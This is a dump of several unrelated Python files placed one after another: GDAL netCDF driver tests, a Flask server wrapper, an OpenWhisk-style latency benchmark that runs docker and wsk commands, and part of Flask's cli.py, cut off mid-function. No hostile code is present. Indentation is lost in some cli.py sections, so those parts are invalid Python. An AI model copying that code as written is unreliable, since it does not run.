# test writing a long metadata > 8196 chars (bug #5113)
def netcdf_35():
    """Metadata longer than 8196 chars must survive a copy (bug #5113)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    ifile = 'data/netcdf_fixes.nc'
    ofile = 'tmp/netcdf_35.nc'

    # copy file
    if netcdf_test_copy(ifile, 0, None, ofile) != 'success':
        return 'fail'

    # test long metadata is copied correctly
    ds = gdal.Open(ofile)
    if ds is None:
        gdaltest.post_reason('open of copy failed')
        return 'fail'
    md = ds.GetMetadata('')

    if 'U#bla' not in md:
        gdaltest.post_reason('U#bla metadata absent')
        return 'fail'
    bla = md['U#bla']
    if len(bla) != 9591:
        gdaltest.post_reason('U#bla metadata is of length %d, expecting %d' % (len(bla),9591))
        return 'fail'
    if bla[-4:] != '_bla':
        gdaltest.post_reason('U#bla metadata ends with [%s], expecting [%s]' % (bla[-4:], '_bla'))
        return 'fail'

    return 'success'
###############################################################################
# test for correct geotransform (bug #5114)
def netcdf_36():
    """Check for a correct geotransform (bug #5114)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    ds = gdal.Open('data/netcdf_fixes.nc')
    if ds is None:
        gdaltest.post_reason('open failed')
        return 'fail'

    gt = ds.GetGeoTransform()
    if gt is None:
        gdaltest.post_reason('got no GeoTransform')
        return 'fail'

    gt_expected = (-3.498749944898817, 0.0025000042385525173, 0.0, 46.61749818589952, 0.0, -0.001666598849826389)
    if gt != gt_expected:
        gdaltest.post_reason('got GeoTransform %s, expected %s' % (str(gt), str(gt_expected)))
        return 'fail'

    return 'success'
###############################################################################
# test for reading gaussian grid (bugs #4513 and #5118)
def netcdf_37():
    """Check reading a gaussian grid (bugs #4513 and #5118)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    gdal.PushErrorHandler('CPLQuietErrorHandler')
    ds = gdal.Open('data/reduce-cgcms.nc')
    gdal.PopErrorHandler()
    if ds is None:
        gdaltest.post_reason('open failed')
        return 'fail'

    gt = ds.GetGeoTransform()
    if gt is None:
        gdaltest.post_reason('got no GeoTransform')
        return 'fail'
    gt_expected = (-1.875, 3.75, 0.0, 89.01354337620016, 0.0, -3.7088976406750063)
    if gt != gt_expected:
        gdaltest.post_reason('got GeoTransform %s, expected %s' % (str(gt), str(gt_expected)))
        return 'fail'

    # the irregular y-axis must also be exposed as 1D geolocation values
    md = ds.GetMetadata('GEOLOCATION2')
    if not md or 'Y_VALUES' not in md:
        gdaltest.post_reason('did not get 1D geolocation')
        return 'fail'
    y_vals = md['Y_VALUES']
    if not y_vals.startswith('{-87.15909455586265,-83.47893666931698,') \
       or not y_vals.endswith(',83.47893666931698,87.15909455586265}'):
        gdaltest.post_reason('got incorrect values in 1D geolocation')
        return 'fail'

    return 'success'
###############################################################################
# test for correct geotransform of projected data in km units (bug #5118)
def netcdf_38():
    """Correct geotransform for projected data in km units (bug #5118)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    gdal.PushErrorHandler('CPLQuietErrorHandler')
    ds = gdal.Open('data/bug5118.nc')
    gdal.PopErrorHandler()
    if ds is None:
        gdaltest.post_reason('open failed')
        return 'fail'

    gt = ds.GetGeoTransform()
    if gt is None:
        gdaltest.post_reason('got no GeoTransform')
        return 'fail'
    gt_expected = (-1659.3478178136488, 13.545000861672793, 0.0, 2330.054725283668, 0.0, -13.54499744233631)
    if gt != gt_expected:
        gdaltest.post_reason('got GeoTransform %s, expected %s' % (str(gt), str(gt_expected)))
        return 'fail'

    return 'success'
###############################################################################
# Test VRT and NETCDF:
def netcdf_39():
    """Test VRT and the NETCDF: subdataset syntax (relative, quoted, absolute)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    def vrt_checksum(src_name, vrt_name='tmp/netcdf_39.vrt'):
        # Copy src through a VRT, then reopen the VRT and return band 1's checksum.
        src_ds = gdal.Open(src_name)
        out_ds = gdal.GetDriverByName('VRT').CreateCopy(vrt_name, src_ds)
        out_ds = None
        src_ds = None
        ds = gdal.Open('tmp/netcdf_39.vrt')
        cs = ds.GetRasterBand(1).Checksum()
        ds = None
        return cs

    # unquoted relative path
    shutil.copy('data/two_vars_scale_offset.nc', 'tmp')
    cs = vrt_checksum('NETCDF:tmp/two_vars_scale_offset.nc:z')
    gdal.Unlink('tmp/two_vars_scale_offset.nc')
    gdal.Unlink('tmp/netcdf_39.vrt')
    if cs != 65463:
        gdaltest.post_reason('failure')
        print(cs)
        return 'fail'

    # quoted relative path
    shutil.copy('data/two_vars_scale_offset.nc', 'tmp')
    cs = vrt_checksum('NETCDF:"tmp/two_vars_scale_offset.nc":z')
    gdal.Unlink('tmp/two_vars_scale_offset.nc')
    gdal.Unlink('tmp/netcdf_39.vrt')
    if cs != 65463:
        gdaltest.post_reason('failure')
        print(cs)
        return 'fail'

    # quoted absolute path, absolute VRT output path
    shutil.copy('data/two_vars_scale_offset.nc', 'tmp')
    cs = vrt_checksum('NETCDF:"%s/tmp/two_vars_scale_offset.nc":z' % os.getcwd(),
                      '%s/tmp/netcdf_39.vrt' % os.getcwd())
    gdal.Unlink('tmp/two_vars_scale_offset.nc')
    gdal.Unlink('tmp/netcdf_39.vrt')
    if cs != 65463:
        gdaltest.post_reason('failure')
        print(cs)
        return 'fail'

    # quoted absolute path to the source data directory
    cs = vrt_checksum('NETCDF:"%s/data/two_vars_scale_offset.nc":z' % os.getcwd())
    gdal.Unlink('tmp/netcdf_39.vrt')
    if cs != 65463:
        gdaltest.post_reason('failure')
        print(cs)
        return 'fail'

    return 'success'
###############################################################################
###############################################################################
# main tests list
# Every netcdf_N test function above, in run order.
gdaltest_list = [
    netcdf_1,
    netcdf_2,
    netcdf_3,
    netcdf_4,
    netcdf_5,
    netcdf_6,
    netcdf_7,
    netcdf_8,
    netcdf_9,
    netcdf_10,
    netcdf_11,
    netcdf_12,
    netcdf_13,
    netcdf_14,
    netcdf_15,
    netcdf_16,
    netcdf_17,
    netcdf_18,
    netcdf_19,
    netcdf_20,
    netcdf_21,
    netcdf_22,
    netcdf_23,
    netcdf_24,
    netcdf_25,
    netcdf_26,
    netcdf_27,
    netcdf_28,
    netcdf_29,
    netcdf_30,
    netcdf_31,
    netcdf_32,
    netcdf_33,
    netcdf_34,
    netcdf_35,
    netcdf_36,
    netcdf_37,
    netcdf_38,
    netcdf_39
    ]

###############################################################################
# basic file creation tests

# (source file, band, expected checksum, nodata, creation options)
init_list = [ \
    ('byte.tif', 1, 4672, None, []),
    ('byte_signed.tif', 1, 4672, None, ['PIXELTYPE=SIGNEDBYTE']),
    ('int16.tif', 1, 4672, None, []),
    ('int32.tif', 1, 4672, None, []),
    ('float32.tif', 1, 4672, None, []),
    ('float64.tif', 1, 4672, None, [])
    ]

# Some tests we don't need to do for each type.
item = init_list[0]
ut = gdaltest.GDALTest( 'netcdf', item[0], item[1], item[2], options=item[4] )
#test geotransform and projection
gdaltest_list.append( (ut.testSetGeoTransform, item[0]) )
gdaltest_list.append( (ut.testSetProjection, item[0]) )
#SetMetadata() not supported
#gdaltest_list.append( (ut.testSetMetadata, item[0]) )

# Others we do for each pixel type.
for item in init_list:
    ut = gdaltest.GDALTest( 'netcdf', item[0], item[1], item[2], options=item[4] )
    # NOTE(review): this check looks ineffective - GDALTest() is a constructor
    # call, and there is no 'continue' after the print - confirm intent.
    if ut is None:
        print( 'GTiff tests skipped' )
    gdaltest_list.append( (ut.testCreateCopy, item[0]) )
    gdaltest_list.append( (ut.testCreate, item[0]) )
    gdaltest_list.append( (ut.testSetNoDataValue, item[0]) )

###############################################################################
# other tests

if __name__ == '__main__':
    gdaltest.setup_run( 'netcdf' )
    gdaltest.run_tests( gdaltest_list )
    #make sure we cleanup
    gdaltest.clean_tmp()
    gdaltest.summarize()
|
server.py | import threading
from flask import Flask
from werkzeug.serving import make_server
class Server:
    """Wrap a Flask app in a manually controlled werkzeug WSGI server.

    make_server() binds the socket immediately; serve_forever() blocks
    until shutdown() is called, so run()/stop() let the caller drive the
    server from separate threads.
    """

    def __init__(self, app: Flask, host: str, port: int):
        # Bind the server up front; serving is deferred to run().
        self.server = make_server(host, port, app)
        # Push an application context for the constructing thread.
        self.context = app.app_context()
        self.context.push()

    def run(self):
        # Blocks until self.server.shutdown() is invoked.
        self.server.serve_forever()

    def stop(self):
        # shutdown() is dispatched on a helper thread - presumably so
        # stop() never blocks its caller; confirm against usage.
        threading.Thread(target=self.server.shutdown).start()
|
run.py | import os
import threading
import time
import sys, getopt
def client(i, results, loopTimes):
    """Worker: run the benchmark script once and store its raw stdout in results[i]."""
    print("client %d start" % i)
    pipe = os.popen("./single-cold_warm.sh -R -t " + str(loopTimes))
    results[i] = pipe.read()
    print("client %d finished" % i)
def warmup(i, warmupTimes, actionName, params):
    """Invoke the action warmupTimes times so its containers are warm."""
    # the command is identical on each iteration, so build it once
    cmd = "wsk -i action invoke %s %s --result --blocking" % (actionName, params)
    for _ in range(warmupTimes):
        os.popen(cmd).read()
    print("client %d warmup finished" % i)
def main():
    """Drive the benchmark: warm up the action, fan out clients, write results."""
    argv = getargv()
    clientNum = argv[0]
    loopTimes = argv[1]
    warmupTimes = argv[2]
    threads = []
    containerName = "nodecomplex"
    actionName = "node-complex"
    params = ""
    # Stop any running containers of the action so invocations start cold.
    r = os.popen("docker stop `docker ps | grep %s | awk {'print $1'}`" %containerName)
    r.read()
    # First: warm up
    for i in range(clientNum):
        t = threading.Thread(target=warmup,args=(i,warmupTimes,actionName,params))
        threads.append(t)
    for i in range(clientNum):
        threads[i].start()
    for i in range(clientNum):
        threads[i].join()
    print("Warm up complete")
    # Second: invoke the actions
    # Initialize the results and the clients
    threads = []
    results = []
    for i in range(clientNum):
        results.append('')
    # Create the clients
    for i in range(clientNum):
        t = threading.Thread(target=client,args=(i,results,loopTimes))
        threads.append(t)
    # start the clients
    for i in range(clientNum):
        threads[i].start()
    for i in range(clientNum):
        threads[i].join()
    # Write one CSV row per request and collect end-to-end latencies.
    outfile = open("result.csv","w")
    outfile.write("invokeTime,startTime,endTime\n")
    latencies = []
    minInvokeTime = 0x7fffffffffffffff
    maxEndTime = 0
    for i in range(clientNum):
        # get and parse the result of a client
        clientResult = parseResult(results[i])
        # print the result of every loop of the client
        for j in range(len(clientResult)):
            outfile.write(clientResult[j][0] + ',' + clientResult[j][1] + \
                ',' + clientResult[j][2] + '\n')
            # Collect the latency (endTime - invokeTime)
            latency = int(clientResult[j][-1]) - int(clientResult[j][0])
            latencies.append(latency)
            # Find the first invoked action and the last return one.
            if int(clientResult[j][0]) < minInvokeTime:
                minInvokeTime = int(clientResult[j][0])
            if int(clientResult[j][-1]) > maxEndTime:
                maxEndTime = int(clientResult[j][-1])
    formatResult(latencies,maxEndTime - minInvokeTime, clientNum, loopTimes, warmupTimes)
def parseResult(result):
    """Parse one client's raw output into [invokeTime, startTime, endTime] rows.

    Each relevant line contains the word "invokeTime" followed by up to three
    13-digit millisecond timestamps; 13 characters are taken starting at each
    digit run. Missing timestamps are left as ''.

    Fixes two defects in the original scanner: it looped forever on a line
    with fewer than three timestamps, and it raised IndexError when a fourth
    digit run appeared after the third timestamp.
    """
    parsedResults = []
    for line in result.split('\n'):
        if line.find("invokeTime") == -1:
            continue
        parsedTimes = ['','','']
        i = 0
        count = 0
        # Single pass over the line, grabbing at most three timestamps.
        while i < len(line) and count < 3:
            if line[i].isdigit():
                parsedTimes[count] = line[i:i+13]
                i += 13
                count += 1
            else:
                i += 1
        parsedResults.append(parsedTimes)
    return parsedResults
def getargv():
    """Parse command-line arguments for the benchmark.

    Returns:
        (clientNum, loopTimes, warmupTimes) as positive ints; warmupTimes
        defaults to 1 when omitted.

    Exits with status 1 on bad arguments (the original exited with 0,
    which hid usage errors from calling shell scripts).
    """
    usage = "Usage: python3 run.py <client number> <loop times> [<warm up times>]"
    if len(sys.argv) not in (3, 4):
        print(usage)
        sys.exit(1)
    if not sys.argv[1].isdigit() or not sys.argv[2].isdigit() \
            or int(sys.argv[1]) < 1 or int(sys.argv[2]) < 1:
        print(usage)
        print("Client number and loop times must be a positive integer")
        sys.exit(1)
    if len(sys.argv) == 4:
        if not sys.argv[3].isdigit() or int(sys.argv[3]) < 1:
            print(usage)
            print("Warm up times must be a positive integer")
            sys.exit(1)
        return (int(sys.argv[1]), int(sys.argv[2]), int(sys.argv[3]))
    # Warm-up count omitted: default to a single warm-up round.
    return (int(sys.argv[1]), int(sys.argv[2]), 1)
def formatResult(latencies,duration,client,loop,warmup):
    """Print latency percentiles/throughput and append them to eval-result.log.

    Args:
        latencies: per-request latencies in ms (sorted in place).
        duration:  wall-clock span of the whole run in ms.
        client, loop, warmup: benchmark parameters, echoed into the log.
    """
    requestNum = len(latencies)
    latencies.sort()
    duration = float(duration)
    averageLatency = float(sum(latencies)) / requestNum

    def percentile(fraction):
        # Element at the given 1-based percentile rank of the sorted list.
        return latencies[int(requestNum * fraction) - 1]

    _50pcLatency = percentile(0.5)
    _75pcLatency = percentile(0.75)
    _90pcLatency = percentile(0.9)
    _95pcLatency = percentile(0.95)
    _99pcLatency = percentile(0.99)
    throughput = requestNum / (duration/1000)

    print("\n")
    print("------------------ result ---------------------")
    print("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%")
    print("%.2f\t%d\t%d\t%d\t%d\t%d" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
    print("throughput (n/s):\n%.2f" %throughput)

    # Append the same summary to the log; "with" guarantees the handle is
    # flushed and closed (the original leaked it). Also fixes the original
    # "warup_times" typo in the logged line.
    with open("eval-result.log","a") as resultfile:
        resultfile.write("\n\n------------------ (concurrent)result ---------------------\n")
        resultfile.write("client: %d, loop_times: %d, warmup_times: %d\n" % (client, loop, warmup))
        resultfile.write("%d requests finished in %.2f seconds\n" %(requestNum, (duration/1000)))
        resultfile.write("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%\n")
        resultfile.write("%.2f\t%d\t%d\t%d\t%d\t%d\n" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
        resultfile.write("throughput (n/s):\n%.2f\n" %throughput)
main() |
cli.py | # -*- coding: utf-8 -*-
"""
flask.cli
~~~~~~~~~
A simple command line application to run flask apps.
:copyright: © 2010 by the Pallets team.
:license: BSD, see LICENSE for more details.
"""
from __future__ import print_function
import ast
import inspect
import os
import re
import ssl
import sys
import traceback
from functools import update_wrapper
from operator import attrgetter
from threading import Lock, Thread
import click
from werkzeug.utils import import_string
from . import __version__
from ._compat import getargspec, iteritems, reraise, text_type
from .globals import current_app
from .helpers import get_debug_flag, get_env, get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
# Subclassing click.UsageError makes the CLI print the message and exit with
# a usage-error status instead of dumping a traceback.
class NoAppException(click.UsageError):
    """Raised if an application cannot be found or loaded."""
def find_best_app(script_info, module):
    """Given a module instance this tries to find the best possible
    application in the module or raises an exception.

    Search order: the conventional names ``app``/``application``, then any
    *single* module-level Flask instance, then the factory names
    ``create_app``/``make_app`` called via :func:`call_factory`.

    :raises NoAppException: if no app (or more than one candidate) is found.
    """
    from . import Flask
    # Search for the most common names first.
    for attr_name in ('app', 'application'):
        app = getattr(module, attr_name, None)
        if isinstance(app, Flask):
            return app
    # Otherwise find the only object that is a Flask instance.
    matches = [
        v for k, v in iteritems(module.__dict__) if isinstance(v, Flask)
    ]
    if len(matches) == 1:
        return matches[0]
    elif len(matches) > 1:
        # Ambiguous: force the user to name the app explicitly.
        raise NoAppException(
            'Detected multiple Flask applications in module "{module}". Use '
            '"FLASK_APP={module}:name" to specify the correct '
            'one.'.format(module=module.__name__)
        )
    # Search for app factory functions.
    for attr_name in ('create_app', 'make_app'):
        app_factory = getattr(module, attr_name, None)
        if inspect.isfunction(app_factory):
            try:
                app = call_factory(script_info, app_factory)
                if isinstance(app, Flask):
                    return app
            except TypeError:
                # Only swallow the TypeError when the *call itself* failed;
                # errors raised inside the factory body propagate unchanged.
                if not _called_with_wrong_args(app_factory):
                    raise
                raise NoAppException(
                    'Detected factory "{factory}" in module "{module}", but '
                    'could not call it without arguments. Use '
                    '"FLASK_APP=\'{module}:{factory}(args)\'" to specify '
                    'arguments.'.format(
                        factory=attr_name, module=module.__name__
                    )
                )
    raise NoAppException(
        'Failed to find Flask application or factory in module "{module}". '
        'Use "FLASK_APP={module}:name to specify one.'.format(
            module=module.__name__
        )
    )
def call_factory(script_info, app_factory, arguments=()):
    """Takes an app factory, a ``script_info`` object and optionally a tuple
    of arguments. Checks for the existence of a script_info argument and calls
    the app_factory depending on that and the arguments provided.
    """
    args_spec = getargspec(app_factory)
    arg_names = args_spec.args
    arg_defaults = args_spec.defaults
    # Factories may accept the ScriptInfo via a keyword ``script_info``.
    if 'script_info' in arg_names:
        return app_factory(*arguments, script_info=script_info)
    elif arguments:
        return app_factory(*arguments)
    # A single required positional parameter is assumed to be script_info.
    elif not arguments and len(arg_names) == 1 and arg_defaults is None:
        return app_factory(script_info)
    return app_factory()
def _called_with_wrong_args(factory):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param factory: the factory function that was called
:return: true if the call failed
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is factory.__code__:
# in the factory, it was called successfully
return False
tb = tb.tb_next
# didn't reach the factory
return True
finally:
del tb
def find_app_by_string(script_info, module, app_name):
    """Checks if the given string is a variable name or a function. If it is a
    function, it checks for specified arguments and whether it takes a
    ``script_info`` argument and calls the function with the appropriate
    arguments.
    """
    from flask import Flask
    # Accept either "name" or "name(arg, ...)".
    match = re.match(r'^ *([^ ()]+) *(?:\((.*?) *,? *\))? *$', app_name)
    if not match:
        raise NoAppException(
            '"{name}" is not a valid variable name or function '
            'expression.'.format(name=app_name)
        )
    name, args = match.groups()
    try:
        attr = getattr(module, name)
    except AttributeError as e:
        raise NoAppException(e.args[0])
    if inspect.isfunction(attr):
        if args:
            try:
                # Parse the literal argument tuple safely (no eval).
                args = ast.literal_eval('({args},)'.format(args=args))
            except (ValueError, SyntaxError)as e:
                raise NoAppException(
                    'Could not parse the arguments in '
                    '"{app_name}".'.format(e=e, app_name=app_name)
                )
        else:
            args = ()
        try:
            app = call_factory(script_info, attr, args)
        except TypeError as e:
            # Re-raise unless the TypeError came from the call itself.
            if not _called_with_wrong_args(attr):
                raise
            raise NoAppException(
                '{e}\nThe factory "{app_name}" in module "{module}" could not '
                'be called with the specified arguments.'.format(
                    e=e, app_name=app_name, module=module.__name__
                )
            )
    else:
        app = attr
    if isinstance(app, Flask):
        return app
    # Whatever we resolved is not a Flask application.
    raise NoAppException(
        'A valid Flask application was not obtained from '
        '"{module}:{app_name}".'.format(
            module=module.__name__, app_name=app_name
        )
    )
def prepare_import(path):
    """Given a filename this will try to calculate the python path, add it
    to the search path and return the actual module name that is expected.
    """
    path = os.path.realpath(path)

    # Strip a ".py" suffix, and collapse package __init__ files to their
    # containing directory.
    base, ext = os.path.splitext(path)
    if ext == '.py':
        path = base
    if os.path.basename(path) == '__init__':
        path = os.path.dirname(path)

    # Walk upwards collecting dotted-name components until we leave the
    # package structure (the parent directory has no __init__.py).
    parts = []
    while True:
        path, tail = os.path.split(path)
        parts.append(tail)
        if not os.path.exists(os.path.join(path, '__init__.py')):
            break

    # Make the package root importable.
    if sys.path[0] != path:
        sys.path.insert(0, path)

    parts.reverse()
    return '.'.join(parts)
def locate_app(script_info, module_name, app_name, raise_if_not_found=True):
    """Import *module_name* and resolve a Flask app inside it.

    When *app_name* is ``None`` the best-guess application is returned,
    otherwise the named variable/factory expression is resolved.
    """
    __traceback_hide__ = True
    try:
        __import__(module_name)
    except ImportError:
        # A traceback deeper than one frame means the ImportError happened
        # *inside* the module being imported -- surface that to the user.
        if sys.exc_info()[-1].tb_next:
            raise NoAppException(
                'While importing "{name}", an ImportError was raised:'
                '\n\n{tb}'.format(name=module_name, tb=traceback.format_exc())
            )
        if raise_if_not_found:
            raise NoAppException(
                'Could not import "{name}".'.format(name=module_name)
            )
        return
    module = sys.modules[module_name]
    if app_name is None:
        return find_best_app(script_info, module)
    return find_app_by_string(script_info, module, app_name)
def get_version(ctx, param, value):
    """Click callback for ``--version``: print versions and exit."""
    if not value or ctx.resilient_parsing:
        return
    versions = {
        'version': __version__,
        'python_version': sys.version,
    }
    message = 'Flask %(version)s\nPython %(python_version)s'
    click.echo(message % versions, color=ctx.color)
    ctx.exit()
# Reusable eager ``--version`` option; runs before any app is loaded and
# does not consume a value.
version_option = click.Option(
    ['--version'],
    help='Show the flask version',
    expose_value=False,
    callback=get_version,
    is_flag=True,
    is_eager=True
)
class DispatchingApp(object):
    """Special application that dispatches to a Flask application which
    is imported by name in a background thread. If an error happens
    it is recorded and shown as part of the WSGI handling which in case
    of the Werkzeug debugger means that it shows up in the browser.
    """
    def __init__(self, loader, use_eager_loading=False):
        # loader: zero-argument callable returning the WSGI application.
        self.loader = loader
        self._app = None
        self._lock = Lock()
        # Holds sys.exc_info() from a failed background load until it can
        # be re-raised inside a request (so the debugger can display it).
        self._bg_loading_exc_info = None
        if use_eager_loading:
            self._load_unlocked()
        else:
            self._load_in_background()
    def _load_in_background(self):
        # Import the app in a daemonless worker thread so server startup
        # is not delayed by a slow (or failing) import.
        def _load_app():
            __traceback_hide__ = True
            with self._lock:
                try:
                    self._load_unlocked()
                except Exception:
                    self._bg_loading_exc_info = sys.exc_info()
        t = Thread(target=_load_app, args=())
        t.start()
    def _flush_bg_loading_exception(self):
        # Re-raise (exactly once) an exception captured by the background
        # loader thread.
        __traceback_hide__ = True
        exc_info = self._bg_loading_exc_info
        if exc_info is not None:
            self._bg_loading_exc_info = None
            reraise(*exc_info)
    def _load_unlocked(self):
        # Caller must hold self._lock (or be the only thread running).
        __traceback_hide__ = True
        self._app = rv = self.loader()
        self._bg_loading_exc_info = None
        return rv
    def __call__(self, environ, start_response):
        """WSGI entry point: dispatch to the app, loading it on first use
        if the background load has not finished (or failed)."""
        __traceback_hide__ = True
        if self._app is not None:
            return self._app(environ, start_response)
        self._flush_bg_loading_exception()
        with self._lock:
            if self._app is not None:
                # Another thread finished loading while we waited.
                rv = self._app
            else:
                rv = self._load_unlocked()
        return rv(environ, start_response)
class ScriptInfo(object):
    """Help object to deal with Flask applications. This is usually not
    necessary to interface with as it's used internally in the dispatching
    to click. In future versions of Flask this object will most likely play
    a bigger role. Typically it's created automatically by the
    :class:`FlaskGroup` but you can also manually create it and pass it
    onwards as click object.
    """
    def __init__(self, app_import_path=None, create_app=None):
        #: Optionally the import path for the Flask application.
        self.app_import_path = app_import_path or os.environ.get('FLASK_APP')
        #: Optionally a function that is passed the script info to create
        #: the instance of the application.
        self.create_app = create_app
        #: A dictionary with arbitrary data that can be associated with
        #: this script info.
        self.data = {}
        # Cache so load_app() imports/creates the application only once.
        self._loaded_app = None
    def load_app(self):
        """Loads the Flask app (if not yet loaded) and returns it. Calling
        this multiple times will just result in the already loaded app to
        be returned.

        :raises NoAppException: if no application could be located.
        """
        __traceback_hide__ = True
        if self._loaded_app is not None:
            return self._loaded_app
        app = None
        if self.create_app is not None:
            # An explicit factory callback always wins.
            app = call_factory(self, self.create_app)
        else:
            if self.app_import_path:
                # FLASK_APP is "module" or "module:name" -- name optional.
                path, name = (self.app_import_path.split(':', 1) + [None])[:2]
                import_name = prepare_import(path)
                app = locate_app(self, import_name, name)
            else:
                # Fall back to conventional filenames in the current dir.
                for path in ('wsgi.py', 'app.py'):
                    import_name = prepare_import(path)
                    app = locate_app(self, import_name, None,
                                     raise_if_not_found=False)
                    if app:
                        break
                if not app:
                    raise NoAppException(
                        'Could not locate a Flask application. You did not provide '
                        'the "FLASK_APP" environment variable, and a "wsgi.py" or '
                        '"app.py" module was not found in the current directory.'
                    )
        debug = get_debug_flag()
        # Update the app's debug flag through the descriptor so that other
        # values repopulate as well.
        if debug is not None:
            app.debug = debug
        self._loaded_app = app
        return app
# Click decorator that ensures a ScriptInfo on the context and passes it as
# the first argument to the decorated callback.
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
    """Wraps a callback so that it's guaranteed to be executed with the
    script's application context. If callbacks are registered directly
    to the ``app.cli`` object then they are wrapped with this function
    by default unless it's disabled.
    """
    @click.pass_context
    def decorator(__ctx, *args, **kwargs):
        # Load (or reuse) the app held by the ScriptInfo on the click
        # context, then invoke the callback inside its app context.
        app = __ctx.ensure_object(ScriptInfo).load_app()
        with app.app_context():
            return __ctx.invoke(f, *args, **kwargs)
    return update_wrapper(decorator, f)
class AppGroup(click.Group):
    """This works similar to a regular click :class:`~click.Group` but it
    changes the behavior of the :meth:`command` decorator so that it
    automatically wraps the functions in :func:`with_appcontext`.
    Not to be confused with :class:`FlaskGroup`.
    """
    def command(self, *args, **kwargs):
        """This works exactly like the method of the same name on a regular
        :class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
        unless it's disabled by passing ``with_appcontext=False``.
        """
        wrap_for_ctx = kwargs.pop('with_appcontext', True)
        def decorator(f):
            # Wrap first so the registered click command invokes the
            # app-context-aware callback.
            if wrap_for_ctx:
                f = with_appcontext(f)
            return click.Group.command(self, *args, **kwargs)(f)
        return decorator
    def group(self, *args, **kwargs):
        """This works exactly like the method of the same name on a regular
        :class:`click.Group` but it defaults the group class to
        :class:`AppGroup`.
        """
        # Subgroups default to AppGroup so nested commands inherit the
        # with_appcontext wrapping behavior.
        kwargs.setdefault('cls', AppGroup)
        return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
    """Special subclass of the :class:`AppGroup` group that supports
    loading more commands from the configured Flask app. Normally a
    developer does not have to interface with this class but there are
    some very advanced use cases for which it makes sense to create an
    instance of this.
    For information as of why this is useful see :ref:`custom-scripts`.
    :param add_default_commands: if this is True then the default run and
        shell commands will be added.
    :param add_version_option: adds the ``--version`` option.
    :param create_app: an optional callback that is passed the script info and
        returns the loaded app.
    :param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
        files to set environment variables. Will also change the working
        directory to the directory containing the first file found.
    .. versionchanged:: 1.0
        If installed, python-dotenv will be used to load environment variables
        from :file:`.env` and :file:`.flaskenv` files.
    """
    def __init__(self, add_default_commands=True, create_app=None,
                 add_version_option=True, load_dotenv=True, **extra):
        params = list(extra.pop('params', None) or ())
        if add_version_option:
            params.append(version_option)
        AppGroup.__init__(self, params=params, **extra)
        self.create_app = create_app
        self.load_dotenv = load_dotenv
        if add_default_commands:
            self.add_command(run_command)
            self.add_command(shell_command)
            self.add_command(routes_command)
        # Entry-point commands are loaded lazily, at most once.
        self._loaded_plugin_commands = False
    def _load_plugin_commands(self):
        # Register commands advertised by installed packages through the
        # "flask.commands" setuptools entry point.
        if self._loaded_plugin_commands:
            return
        try:
            import pkg_resources
        except ImportError:
            # Without setuptools there are no entry points to discover.
            self._loaded_plugin_commands = True
            return
        for ep in pkg_resources.iter_entry_points('flask.commands'):
            self.add_command(ep.load(), ep.name)
        self._loaded_plugin_commands = True
    def get_command(self, ctx, name):
        """Resolve *name* as a built-in/plugin command first, then as a
        command registered on the application's own ``app.cli``."""
        self._load_plugin_commands()
        # We load built-in commands first as these should always be the
        # same no matter what the app does. If the app does want to
        # override this it needs to make a custom instance of this group
        # and not attach the default commands.
        #
        # This also means that the script stays functional in case the
        # application completely fails.
        rv = AppGroup.get_command(self, ctx, name)
        if rv is not None:
            return rv
        info = ctx.ensure_object(ScriptInfo)
        try:
            rv = info.load_app().cli.get_command(ctx, name)
            if rv is not None:
                return rv
        except NoAppException:
            # No app available: fall through and return None (unknown cmd).
            pass
    def list_commands(self, ctx):
        """Return the sorted union of built-in/plugin commands and the
        application's own commands."""
        self._load_plugin_commands()
        # The commands available is the list of both the application (if
        # available) plus the builtin commands.
        rv = set(click.Group.list_commands(self, ctx))
        info = ctx.ensure_object(ScriptInfo)
        try:
            rv.update(info.load_app().cli.list_commands(ctx))
        except Exception:
            # Here we intentionally swallow all exceptions as we don't
            # want the help page to break if the app does not exist.
            # If someone attempts to use the command we try to create
            # the app again and this will give us the error.
            # However, we will not do so silently because that would confuse
            # users.
            traceback.print_exc()
        return sorted(rv)
    def main(self, *args, **kwargs):
        # Set a global flag that indicates that we were invoked from the
        # command line interface. This is detected by Flask.run to make the
        # call into a no-op. This is necessary to avoid ugly errors when the
        # script that is loaded here also attempts to start a server.
        os.environ['FLASK_RUN_FROM_CLI'] = 'true'
        if get_load_dotenv(self.load_dotenv):
            load_dotenv()
        obj = kwargs.get('obj')
        if obj is None:
            obj = ScriptInfo(create_app=self.create_app)
        kwargs['obj'] = obj
        # Allow options to be supplied via FLASK_* environment variables.
        kwargs.setdefault('auto_envvar_prefix', 'FLASK')
        return super(FlaskGroup, self).main(*args, **kwargs)
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path):].lstrip(os.sep)) == other
def load_dotenv(path=None):
    """Load "dotenv" files in order of precedence to set environment variables.
    If an env var is already set it is not overwritten, so earlier files in the
    list are preferred over later files.
    Changes the current working directory to the location of the first file
    found, with the assumption that it is in the top level project directory
    and will be where the Python path should import local packages from.
    This is a no-op if `python-dotenv`_ is not installed.
    .. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
    :param path: Load the file at this location instead of searching.
    :return: ``True`` if a file was loaded.
    .. versionadded:: 1.0
    """
    if dotenv is None:
        # python-dotenv is not installed; just hint when files are present.
        if path or os.path.exists('.env') or os.path.exists('.flaskenv'):
            click.secho(
                ' * Tip: There are .env files present.'
                ' Do "pip install python-dotenv" to use them.',
                fg='yellow')
        return
    if path is not None:
        return dotenv.load_dotenv(path)
    new_dir = None
